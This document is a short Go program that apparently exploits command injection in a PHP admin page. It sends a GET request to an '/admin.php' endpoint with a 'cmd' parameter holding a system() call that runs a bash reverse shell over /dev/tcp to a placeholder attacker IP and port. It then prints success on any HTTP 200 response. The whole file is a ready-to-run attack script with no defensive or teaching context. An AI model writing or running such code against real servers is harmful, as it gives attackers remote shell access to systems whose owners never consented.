package main
 
import (
    "fmt"
    "net/http"
    "net/url"
    "strings"
)
 
func main() {
    targetURL := "http://example.com"
    vulnPath := "/admin.php"
    vulnParam := "cmd"
 
    payload := "system('bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1')"
 
    client := http.Client{}
    req, err := http.NewRequest("GET", targetURL+vulnPath, nil)
    if err != nil {
        fmt.Println("Error creating HTTP request:", err)
        return
    }
 
    q := url.Values{}
    q.Add(vulnParam, payload)
    req.URL.RawQuery = q.Encode()
 
    resp, err := client.Do(req)
    if err != nil {
        fmt.Println("Error sending HTTP request:", err)
        return
    }
 
    defer resp.Body.Close()
 
    if resp.StatusCode == 200 {
        fmt.Println("Vulnerability exploited successfully!")
    } else {
        fmt.Println("Exploit failed")
    }
}